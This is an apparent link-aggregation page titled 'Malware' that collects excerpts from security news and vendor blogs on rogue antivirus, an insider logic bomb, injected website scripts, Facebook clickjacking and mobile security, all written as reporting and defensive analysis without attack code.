background preloader

Malware

Facebook Twitter

Rocra Espionage Malware Campaign Uncovered After Five Years of Activity. MSRT Tackles Fake Microsoft Security Essentials - Microsoft Malware Protection Center. We've seen a few rogue security programs use elements of legitimate security software in order to try to make themselves appear more authentic. It was inevitable that Microsoft Security Essentials would be the target of this kind mimicry. While some rogues have simply copied Security Essentials' name, others have gone further by imitating elements of the Security Essentials user interface. By far the most prevalent of these is Win32/FakePAV, which is this month's addition to the MSRT family list.

When FakePAV sees an attempt to run certain programs, it displays a fake Security Essentials alert dialog. At first glance, there is very little that differentiates this from a real Security Essentials alert, beyond the bogus malware name ("Unknown Win32/Trojan"). You can close the window, but in a crude attempt to emulate the behavior of real-time malware blocking, FakePAV also terminates the program that it reports as a threat. It then pretends to scan the file again. -- Hamish O'Dea. Feds: TSA Worker Tried to Sabotage Terror Database | Threat Leve. A former Transportation Security Administration contractor is being charged in Colorado for allegedly injecting malicious code into a government network used for screening airport security workers and others. The malicious code, a logic bomb installed last October, was designed to cause damage and disrupt data on servers on an undisclosed date but was caught by other workers before it delivered its payload.

Douglas James Duchak, 46, had worked as a data analyst at the TSA’s Colorado Springs Operations Center, or CSOC, since 2004. The CSOC is used to vet people who have “access to sensitive information and secure areas of the nation’s transportation network,” according to the indictment. A source involved in the case said this involved screening of both passengers and workers at airports and other transportation facilities. He pleaded not guilty in a Denver federal court on Wednesday and was released on a $25,000 unsecured bond. Duchak has been charged in the U.S. Photo: ellenm1/Flickr. Quarter Million Malicious Facebook Posts « Defensio, the blog. Posted: 16 Apr 2014 03:45 AM | Elad Sharf | Targeted attacks are one of the hottest topics in the cyber security community today. Often when the term 'targeted attack' is used, a politically-motivated attack springs to mind, or what we like to call Cyberwarfare - a low volume and state-sponsored targeted attack that in many cases employs...

Read more > Filed under: Targeted attacks, Zeus, Toolkits, cyber-crime, Citadel Posted: 11 Apr 2014 03:15 | Jason Hill | Following on from our previous Heartbleed post , there have been countless reports on the far-reaching scale of this critical security flaw along with numerous discussions as to what 'exactly' an attacker can gain from exploiting the vulnerability. Given the online and 'connected' nature... Read more > Filed under: Vulnerabilities, Exploit, CVE-2014-0160, OpenSSL, Heartbleed Posted: 09 Apr 2014 05:56 | Carl Leonard | Read more > Posted: 02 Apr 2014 05:07 | Sindyan | Read more > Filed under: Malware, exploit kit, FIESTA, iframe Read more > More on Troj/JSRedir-AK | SophosLabs blog. Over 170,000 people are part of the Sophos community on Facebook. Why not join us on Facebook to find out about the latest security threats. Hi fellow Twitter user! Follow our team of security experts on Twitter for the latest news about internet security threats.

Already using Google+? Find us on Google+ for the latest security news. Since first releasing detection (2 days ago) for Troj/JSRedir-AK SophosLabs have seen thousands of websites affected by it. Since blogging yesterday we have seen a few minor variants and have had to update the our detection. One of the updates has been to detect the malicious script when appended to HTML files within script tags as well as being appended to JavaScript files.

Sophos has been contacting owners of affected websites and one of the main methods for infection is via compromised FTP credentials. Merry Christmas and have a Happy New Year. <a href=" Our Poll</a> New Facebook Clickjacking Attack Is on the Loose [WARNING] A new Facebook clickjacking attack is making the rounds, and this one is as sly as they come. The attack spreads through a malicious website, leading users to this YouTube video. The method used to spread the link is particularly interesting. A Facebook user sees a post on a friend's wall, with a thumbnail and the caption "New Pix. " Clicking on this link will lead you to the aforementioned video, but it will also spread by posting the same link on your own wall, seemingly without your intervention.

The trick is in the fake turing test, seemingly set up to determine if the user is human. Needless to say, this type of attack can easily trick the user into opening something far more dangerous than a YouTube video. From Hidden Iframes to Obfuscated Scripts | Unmask Parasites. Bl. 23 Dec 09 Filed in Website exploits In December, I noticed that ubiquitous hidden iframes that have been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites. At the same time I noticed a new type of obfuscated scripts injected into hacked websites.

And I believe it’s a new incarnation of the same attack that previously injected hidden iframes. Here’s the story A few weeks ago I stumbled upon an infected site with the following script: When I deobfuscated it, it made me laugh. .ru:8080/google.com/google.com/bing.com/google.fr/wordpress.org/ This looked like overkill. Joomla-orgspankwire.comw3schools-comgoogle.com (2 times!) Variations Common features This set of 5 IPs is not static. Security firms gird for attacks on smart phones. Mobile devices have been mostly spared from the onslaught of cyber-attacks that prey on computer users every day, but security vendors are already positioning themselves in anticipation of a swell in the demand for such services and products in the next couple of years.

Last month, for instance, Sunnyvale security company Symantec announced it would begin offering free online software and services to protect data on smart phones. Santa Clara competitor McAfee said the same week it will acquire mobile security firm Trust Digital in a deal set to be completed by the end of the month. Most of the other big names in the security market, like Kaspersky, AVG and TrendMicro, already offer some kind of mobile solution as well. "Nobody's making money at the moment with mobile security.

Mobile security today mostly revolves around protecting this data and minimizing the risks of phone theft or loss. Not at critical mass In the computer world, "basically everybody is on Windows," he said.